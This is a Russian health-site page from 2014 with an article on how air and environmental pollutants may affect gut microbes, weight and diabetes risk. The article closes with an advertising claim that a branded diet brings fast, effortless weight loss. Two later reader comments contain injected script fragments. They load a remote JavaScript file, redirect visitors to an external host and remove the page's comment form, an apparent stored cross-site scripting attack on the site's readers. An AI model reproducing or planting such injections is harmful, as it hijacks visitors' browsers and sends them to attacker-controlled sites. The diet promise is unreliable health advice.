Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Может ли воздух влиять на...  >>  Может ли воздух влиять на ваш вес?
 
Обратная связь
 

Может ли воздух влиять на ваш вес?

Размер шрифта
22 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Конечно, переедание и малоподвижный образ жизни – главные враги вашей осиной талии, но и влияние химических факторов окружающей среды не стоит сбрасывать со счетов. Ученые пришли к выводу, что загрязнение воздуха является одним из тех факторов, который убивает вашу стройность и повышает риск развития сахарного диабета.

Может ли воздух влиять на ваш вес?

В ходе исследования, проведенного в стенах Корнельского университета (США), выяснилось, что химические вещества, загрязняющие окружающие среду, могут оказывать влияние на рост и развитие микробов внутри вашего кишечника. Напомним, что число последних превышает в десять раз количество всех клеток человеческого организма, однако только сейчас ученые начинают постепенно подбираться к пониманию подлинного их значения для нашего здоровья.

Что мы знаем наверняка: эти микробы играют значительную в регуляции обмена веществ и продукции инсулина. Видимо, ежедневное воздействие химических загрязнителей, которые мы полной грудью вдыхаем с воздухом, пьем вместе с водой и так далее, нарушает их способность расщеплять жиры. Что для нас совсем невыгодно, разумеется: то, что не съели бактерии, окажется в итоге у нас на бедрах и на животе.

Впрочем, в этом вопросе есть свои нюансы.

«Кишечные микробы помогают нам переваривать жир. Этот процесс нарушается при длительном воздействии химического загрязнителя. Однако принципы этих нарушений могут варьировать в зависимости от конкретного химического вещества», – рассказывает доктор Нихил Дхарандхар, доцент Биомедицинского исследовательского центра в Пеннигтоне (США). «В некоторых случаях происходит увеличение отложения жировой ткани, в других – запускается механизм переедания или повреждается регуляция энергетических систем организма».

Другая теория состоит в том, что химические загрязнители грубо вмешиваются в процесс человеческого развития во время подросткового периода, что, возможно, увеличивает склонность к набору веса и диабету.

Ранее ученые из Корнельского университета провели серию экспериментов на лабораторных мышах и выяснили, что животные стремительно набирали вес под воздействием химических загрязнителей, обнаруживаемых в красках, обоях, тканях и покрытии пола. Другие одиозные химикаты – инсектицид ДДТ, диоксин и полихлорированные дефенилы – проявили себя как триггеры сахарного диабета II типа.

Впрочем, доктор Дхурандхар спешит сделать оговорку: влияние загрязнителей на метаболизм – это лишь верхушка айсберга. «И ожирение, и сахарный диабет – заболевания крайне сложные и многофакторные», – говорит ученый. «Помимо двух основных причин – переедания и малоподвижного образа – есть как минимум десять факторов, которые рассматриваются в качестве потенциальных пусковых механизмов для этих болезней. Загрязнение окружающей среды – лишь один из них».

Стоит отметить, что ежегодный финансовый ущерб, связанный с лечением ожирения и его осложнений, превышает 160 миллиардов долларов в одних только Соединенных Штатах, что составляет 16% от всех экономических затрат в медицине. Каждый десятый американец страдает ожирением, примерно такая же удручающая ситуация складывается и в нашей стране. К сожалению, по-настоящему эффективные средства лечения и профилактики (скажем, вакцина) этого бича пока не разработаны. Поэтому все, что нам остается, – больше двигаться и заботиться об окружающем мире.

Ну, и правильно питаться, разумеется! Этот фактор, является важнейшим в вопросах лишнего веса. К счастью, теперь у вас есть «Диета Елены Малышевой», с помощью которой вы похудеете быстро и абсолютно без всякого дискомфорта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:50

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В новый год – с новым весом!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда, которая заставляет вас ЕСТЬ

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.